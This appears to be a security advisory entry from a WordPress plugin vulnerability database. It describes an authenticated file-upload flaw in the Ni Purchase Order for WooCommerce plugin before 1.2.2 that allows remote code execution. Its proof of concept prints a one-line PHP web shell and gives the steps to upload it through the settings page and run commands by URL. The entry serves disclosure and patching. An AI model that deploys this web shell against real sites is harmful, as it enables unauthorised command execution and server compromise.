WordPress Plugin Vulnerabilities
Ni Purchase Order(PO) For WooCommerce < 1.2.2 - Admin+ File Upload to Remote Code Execution
Description
The plugin does not validate logo and signature image files uploaded in the settings, allowing high privileged user to upload arbitrary files to the web server, triggering an RCE vulnerability by uploading a web shell.
Proof of Concept
1. Create a malicious file `exploit.php` with the contents `<?php echo system($_GET['cmd']); ?>` 2. Visit https://example.com/wordpress/wp-admin/admin.php?page=niwoopo-setting 3. Select the `cmd.php` file in the Logo or Signature section and save the settings. The file will be accessible at https://example.com/wordpress/wp-content/uploads/ni-purchase-order/cmd.php?cmd=ls and it will show a directory listing
Affects Plugins
References
CVE
YouTube Video
Classification
Type
RCE
OWASP top 10
CWE
Miscellaneous
Original Researcher
Dao Xuan Hieu
Submitter
Dao Xuan Hieu
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-26 (about 7 months ago)
Added
2023-12-12 (about 5 months ago)
Last Updated
2024-03-21 (about 1 months ago)